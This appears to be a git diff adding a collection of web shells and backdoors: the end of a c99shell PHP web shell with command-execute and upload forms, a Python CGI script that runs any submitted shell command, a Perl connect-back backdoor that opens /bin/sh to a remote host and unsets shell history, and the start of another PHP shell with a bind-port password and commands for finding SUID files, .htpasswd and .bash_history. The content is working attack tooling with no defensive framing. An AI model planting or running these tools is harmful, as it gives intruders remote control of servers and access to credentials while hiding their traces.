+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
+"RYtMAgEAOw==",
+"ext_cmd"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_cpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
+"Eq7YrLDE7a4SADs=",
+"ext_ini"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_diz"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+"Ow==",
+"ext_doc"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
+"ext_exe"=>
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
+"xhIAOw==",
+"ext_h"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
+"Wq/NknbbSgAAOw==",
+"ext_hpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
+"UqUagnbLdZa+YFcCADs=",
+"ext_htaccess"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_html"=>
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_jpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_js"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+"a00AjYYBbc/o9HjNniUAADs=",
+"ext_lnk"=>
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
+"ADs=",
+"ext_log"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
+"ext_php"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
+"ext_pl"=>
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
+"ext_swf"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_tar"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7"
+ );
+ //For simple size- and speed-optimization.
+ $imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+ }
+ else
+ {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+ }
+ exit;
+}
+if ($act == "about") {echo "<center><b>Credits:<br>www.spygrup.org<br>Kruis [Admin@SpyGrup.Org]<br>YaduriS [YaduriS@SpyGrup.Org]<br></b>";}
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr>
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute"></form></td></tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type="hidden" name="act" value="search"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type="submit" name="submit" value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type="hidden" name="act" value="upload"><input type="file" name="uploadfile"><input type="hidden" name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form method="POST"><input type="hidden" name="act" value="mkdir"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type="submit" value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type="hidden" name="act" value="mkfile"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type="hidden" name="ft" value="edit">&nbsp;<input type="submit" value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo htmlspecialchars($surl); ?>"><input type="hidden" name="act" value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type="submit" value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo htmlspecialchars($surl); ?>"><input type="hidden" name="act" value="gofile"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type="submit" value="Go"></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>powered by</b></u></a> SpyGrup.Org | <a href="http://www.spygrup.org"><font color="#FF0000">SpyGrup.Org</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
+</body></html><?php chdir($lastdir); exit; ?>
+
diff --git a/138shell/C/cgi-python.py.txt b/138shell/C/cgi-python.py.txt
new file mode 100644
index 0000000..0002497
--- /dev/null
+++ b/138shell/C/cgi-python.py.txt
@@ -0,0 +1,124 @@
+#!/usr/bin/python
+# 07-07-04
+# v1.0.0
+
+# cgi-shell.py
+# A simple CGI that executes arbitrary shell commands.
+
+
+# Copyright Michael Foord
+# You are free to modify, use and relicense this code.
+
+# No warranty express or implied for the accuracy, fitness to purpose or otherwise for this code....
+# Use at your own risk !!!
+
+# E-mail michael AT foord DOT me DOT uk
+# Maintained at www.voidspace.org.uk/atlantibots/pythonutils.html
+
+"""
+A simple CGI script to execute shell commands via CGI.
+"""
+################################################################
+# Imports
+try:
+    import cgitb; cgitb.enable()
+except:
+    pass
+import sys, cgi, os
+sys.stderr = sys.stdout
+from time import strftime
+import traceback
+from StringIO import StringIO
+from traceback import print_exc
+
+################################################################
+# constants
+
+fontline = '<FONT COLOR=#424242 style="font-family:times;font-size:12pt;">'
+versionstring = 'Version 1.0.0 7th July 2004'
+
+if os.environ.has_key("SCRIPT_NAME"):
+    scriptname = os.environ["SCRIPT_NAME"]
+else:
+    scriptname = ""
+
+METHOD = '"POST"'
+
+################################################################
+# Private functions and variables
+
+def getform(valuelist, theform, notpresent=''):
+    """This function, given a CGI form, extracts the data from it, based on
+    valuelist passed in. Any non-present values are set to '' - although this can be changed.
+    (e.g. to return None so you can test for missing keywords - where '' is a valid answer but to have the field missing isn't.)"""
+    data = {}
+    for field in valuelist:
+        if not theform.has_key(field):
+            data[field] = notpresent
+        else:
+            if  type(theform[field]) != type([]):
+                data[field] = theform[field].value
+            else:
+                values = map(lambda x: x.value, theform[field])     # allows for list type values
+                data[field] = values
+    return data
+
+
+theformhead = """<HTML><HEAD><TITLE>cgi-shell.py - a CGI by Fuzzyman</TITLE></HEAD>
+<BODY><CENTER>
+<H1>Welcome to cgi-shell.py - <BR>a Python CGI</H1>
+<B><I>By Fuzzyman</B></I><BR>
+"""+fontline +"Version : " + versionstring + """, Running on : """ + strftime('%I:%M %p, %A %d %B, %Y')+'.</CENTER><BR>'
+
+theform = """<H2>Enter Command</H2>
+<FORM METHOD=\"""" + METHOD + '" action="' + scriptname + """\">
+<input name=cmd type=text><BR>
+<input type=submit value="Submit"><BR>
+</FORM><BR><BR>"""
+bodyend = '</BODY></HTML>'
+errormess = '<CENTER><H2>Something Went Wrong</H2><BR><PRE>'
+
+################################################################
+# main body of the script
+
+if __name__ == '__main__':
+    print "Content-type: text/html"         # this is the header to the server
+    print                                   # so is this blank line
+    form = cgi.FieldStorage()
+    data = getform(['cmd'],form)
+    thecmd = data['cmd']
+    print theformhead
+    print theform
+    if thecmd:
+        print '<HR><BR><BR>'
+        print '<B>Command : ', thecmd, '<BR><BR>'
+        print 'Result : <BR><BR>'
+        try:
+            child_stdin, child_stdout = os.popen2(thecmd)
+            child_stdin.close()
+            result = child_stdout.read()
+            child_stdout.close()
+            print result.replace('\n', '<BR>')
+
+        except Exception, e:                      # an error in executing the command
+            print errormess
+            f = StringIO()
+            print_exc(file=f)
+            a = f.getvalue().splitlines()
+            for line in a:
+                print line
+
+    print bodyend
+
+
+"""
+TODO/ISSUES
+
+
+
+CHANGELOG
+
+07-07-04        Version 1.0.0
+A very basic system for executing shell commands.
+I may expand it into a proper 'environment' with session persistence...
+"""
diff --git a/138shell/C/connectback2.pl.txt b/138shell/C/connectback2.pl.txt
new file mode 100644
index 0000000..f4571e6
--- /dev/null
+++ b/138shell/C/connectback2.pl.txt
@@ -0,0 +1,61 @@
+#!/usr/bin/perl
+use IO::Socket;
+#WwW.CoM Security Hackers          
+#coded bY: MasterKid
+#We Are: MasterKid, AleXutz, FatMan & MiKuTuL                                          
+#Email: muzicteam2006@yahoo.com
+#
+#kid@SlackwareLinux:/home/programing$ perl dc.pl
+#--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
+#
+#Usage: dc.pl [Host] [Port]
+#
+#Ex: dc.pl 127.0.0.1 2121
+#kid@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
+#--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
+#
+#[*] Resolving HostName
+#[*] Connecting... 127.0.0.1
+#[*] Spawning Shell
+#[*] Connected to remote host
+
+#bash-2.05b# nc -vv -l -p 2121
+#listening on [any] 2121 ...
+#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
+#--== ConnectBack Backdoor vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
+#
+#--==Systeminfo==--
+#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
+#
+#--==Userinfo==--
+#uid=1001(lord) gid=100(users) groups=100(users)
+#
+#--==Directory==--
+#/root
+#
+#--==Shell==--
+#
+$system	= '/bin/sh';
+$ARGC=@ARGV; 
+print "--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==-- \n\n"; 
+if ($ARGC!=2) { 
+   print "Usage: $0 [Host] [Port] \n\n"; 
+   die "Ex: $0 127.0.0.1 2121 \n"; 
+} 
+use Socket; 
+use FileHandle; 
+socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 
+connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 
+print "[*] Resolving HostName\n";
+print "[*] Connecting... $ARGV[0] \n"; 
+print "[*] Spawning Shell \n";
+print "[*] Connected to remote host \n";
+SOCKET->autoflush(); 
+open(STDIN, ">&SOCKET"); 
+open(STDOUT,">&SOCKET"); 
+open(STDERR,">&SOCKET"); 
+print "--== ConnectBack Backdoor vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--  \n\n"; 
+system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
+echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); 
+system($system);
+#EOF
\ No newline at end of file
diff --git a/138shell/C/ctt_sh.php.txt b/138shell/C/ctt_sh.php.txt
new file mode 100644
index 0000000..51ec008
--- /dev/null
+++ b/138shell/C/ctt_sh.php.txt
@@ -0,0 +1,2927 @@
+<?php
+$timelimit = 60;
+$sul = "?";
+$rd = "./";
+$shver = "0.1";
+$login = "";
+$pass = "";
+$md5_pass = "";
+$login = false;
+$autoupdate = true;
+$updatenow = false;
+$autochmod = 755; 
+$filestealth = 1; 
+$donated_html = "";
+$donated_act = array("");
+$host_allow = array("*");
+$curdir = "./";
+$tmpdir = dirname(__FILE__); 
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
+ "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar")
+);
+$hexdump_lines = 8;
+$hexdump_rows = 24;
+$nixpwdperpage = 9999;
+$bindport_pass = "ctt";
+$bindport_port = "11457";
+$aliases = array();
+$aliases[] = array("-----------------------------------------------------------", "ls -la");
+$aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
+$aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
+$aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
+$aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
+$aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
+$aliases[] = array("find config* files", "find / -type f -name \"config*\"");
+ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
+$aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
+$aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
+$aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
+$aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
+$aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
+$aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
+$aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
+$aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
